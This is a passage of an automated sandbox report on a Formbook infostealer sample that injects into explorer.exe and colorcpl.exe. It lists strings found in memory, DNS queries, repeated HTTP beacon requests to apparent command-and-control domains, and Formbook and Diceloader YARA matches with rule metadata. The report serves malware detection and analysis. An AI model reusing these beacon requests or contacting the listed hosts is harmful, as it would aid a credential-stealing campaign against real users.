Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.revistabrasileiramarketing.info/jskg/
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.revistabrasileiramarketing.info/jskg/www.lactationdrink.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.revistabrasileiramarketing.infoReferer:
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.saraadamchak.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.saraadamchak.com/jskg/
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.saraadamchak.com/jskg/www.kvrkl.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.saraadamchak.comReferer:
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.successwithyolandafgreen.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.successwithyolandafgreen.com/jskg/
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.successwithyolandafgreen.com/jskg/www.lbarco.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.successwithyolandafgreen.comReferer:
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.switchtoambitwithmirtha.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.switchtoambitwithmirtha.com/jskg/
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.switchtoambitwithmirtha.com/jskg/www.ppc-listing.info
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.switchtoambitwithmirtha.comReferer:
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.topazkibblez.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.topazkibblez.com/jskg/
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.topazkibblez.com/jskg/www.coryfireshop.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.topazkibblez.comReferer:
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.wisdomtoothguru.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.wisdomtoothguru.com/jskg/
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.wisdomtoothguru.com/jskg/www.successwithyolandafgreen.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.wisdomtoothguru.comReferer:
Source: explorer.exe, 00000003.00000003.3779584594.000000000C547000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2007842523.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094563543.000000000C547000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4455465026.000000000C54A000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000003.00000003.3095015364.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3780015458.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2003510228.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4451321955.00000000076F8000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000003.00000002.4453052192.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2005157411.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000003.00000000.2003510228.0000000007637000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4451321955.0000000007637000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000003.00000003.3779212000.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2002563045.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4450259084.00000000035FA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://arc.msn.coml
Source: explorer.exe, 00000003.00000003.3094165083.0000000009BAC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3095171280.0000000009BB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4453687156.0000000009BB2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2005157411.0000000009BAC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000003.00000000.2005157411.0000000009BAC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4453687156.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094165083.0000000009D42000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000003.00000002.4455231166.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2007842523.000000000C460000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000003.00000002.4453052192.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2005157411.00000000099C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://wns.windows.com/)s
Source: explorer.exe, 00000003.00000002.4453052192.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2005157411.00000000099C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://word.office.comon
Source: explorer.exe, 00000003.00000002.4456836117.0000000011332000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 00000004.00000002.4450315499.00000000054F2000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: unknown DNS traffic detected: queries for: www.revistabrasileiramarketing.info
Source: C:\Windows\explorer.exe Code function: 3_2_103F1302 getaddrinfo,setsockopt,recv, 3_2_103F1302
Source: global traffic HTTP traffic detected: GET /jskg/?yV3lvHf=VpJkz2P0T+/fMnrM7Dd1ATiiN68XLLnGpPbE/bn1fGrx+Ecv7ydvnShawUNCssxxEBuD&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lactationdrink.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jskg/?yV3lvHf=sl42yIbVTE2EkcOIsEKOUlHCBbE7QxdA6NZ7PagwYH4YR2l/R8Pf4e2TsXHmMhsmvqG9&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lbarco.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jskg/?yV3lvHf=rveZUXr0eiAxnxziI1jk8UfOJjaXPdODc7FyD8YkXp0tAnYlEmHCL6gZaE21r0Zq0hTH&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lacroixundkress.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jskg/?yV3lvHf=D3ZsiJPHujYqAAcPubxypI16Ov1mNCduO0wq0OOwpknW2PP1SKlK/fdwCNTvhBS54Rsq&8pbLu=d8z4X8O0M HTTP/1.1Host: www.saraadamchak.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jskg/?yV3lvHf=YCW0/yd7C01aElrhcPhS/kt9m722krufJvCDJvN/MprEBXvxMY86CRBbv2aG0eSAUYQv&8pbLu=d8z4X8O0M HTTP/1.1Host: www.erotictoybox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jskg/?yV3lvHf=VpJkz2P0T+/fMnrM7Dd1ATiiN68XLLnGpPbE/bn1fGrx+Ecv7ydvnShawUNCssxxEBuD&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lactationdrink.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jskg/?yV3lvHf=sl42yIbVTE2EkcOIsEKOUlHCBbE7QxdA6NZ7PagwYH4YR2l/R8Pf4e2TsXHmMhsmvqG9&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lbarco.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jskg/?yV3lvHf=rveZUXr0eiAxnxziI1jk8UfOJjaXPdODc7FyD8YkXp0tAnYlEmHCL6gZaE21r0Zq0hTH&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lacroixundkress.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jskg/?yV3lvHf=D3ZsiJPHujYqAAcPubxypI16Ov1mNCduO0wq0OOwpknW2PP1SKlK/fdwCNTvhBS54Rsq&8pbLu=d8z4X8O0M HTTP/1.1Host: www.saraadamchak.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jskg/?yV3lvHf=YCW0/yd7C01aElrhcPhS/kt9m722krufJvCDJvN/MprEBXvxMY86CRBbv2aG0eSAUYQv&8pbLu=d8z4X8O0M HTTP/1.1Host: www.erotictoybox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jskg/?yV3lvHf=VpJkz2P0T+/fMnrM7Dd1ATiiN68XLLnGpPbE/bn1fGrx+Ecv7ydvnShawUNCssxxEBuD&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lactationdrink.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jskg/?yV3lvHf=sl42yIbVTE2EkcOIsEKOUlHCBbE7QxdA6NZ7PagwYH4YR2l/R8Pf4e2TsXHmMhsmvqG9&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lbarco.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jskg/?yV3lvHf=rveZUXr0eiAxnxziI1jk8UfOJjaXPdODc7FyD8YkXp0tAnYlEmHCL6gZaE21r0Zq0hTH&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lacroixundkress.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud

Source: Yara match File source: 2.2.1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.1.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.1.exe.407d900.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.1.exe.3fbfe60.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.1.exe.4009280.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.4449219136.00000000030B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2045843901.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2021713062.0000000003E79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4449610086.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: 2.2.1.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.1.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.1.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.1.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.1.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.1.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.1.exe.407d900.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.1.exe.407d900.4.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.1.exe.407d900.4.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.1.exe.3fbfe60.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.1.exe.3fbfe60.5.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.1.exe.3fbfe60.5.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.1.exe.4009280.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.1.exe.4009280.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.1.exe.4009280.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.2046232928.0000000001270000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000003.00000002.4456583793.00000000103B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000004.00000002.4449703704.0000000004C50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000004.00000002.4449219136.00000000030B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4449219136.00000000030B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.4449219136.00000000030B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.4456692490.00000000108B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000002.00000002.2045843901.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2045843901.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.2045843901.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.2021713062.0000000003E79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.2021713062.0000000003E79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.2021713062.0000000003E79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.2046258222.0000000001289000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000004.00000002.4449653470.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000004.00000002.4449610086.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4449610086.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.4449610086.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: 1.exe PID: 1892, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: 1.exe PID: 2136, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: colorcpl.exe PID: 3716, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.1.exe.26a00000.6.raw.unpack, .cs Large array initialization: : array initializer size 29521
Source: 1.exe, SplashScreen1.cs Long String: Length: 81136
Source: 3.2.explorer.exe.111b7960.0.raw.unpack, SplashScreen1.cs Long String: Length: 81136
Source: 4.2.colorcpl.exe.5377960.3.raw.unpack, SplashScreen1.cs Long String: Length: 81136
Source: 1.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 2.2.1.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.1.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.1.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.1.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.1.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.1.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.1.exe.407d900.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.1.exe.407d900.4.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.1.exe.407d900.4.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.1.exe.3fbfe60.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.1.exe.3fbfe60.5.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.1.exe.3fbfe60.5.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.1.exe.4009280.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.1.exe.4009280.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.1.exe.4009280.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.2046232928.0000000001270000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000003.00000002.4456583793.00000000103B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
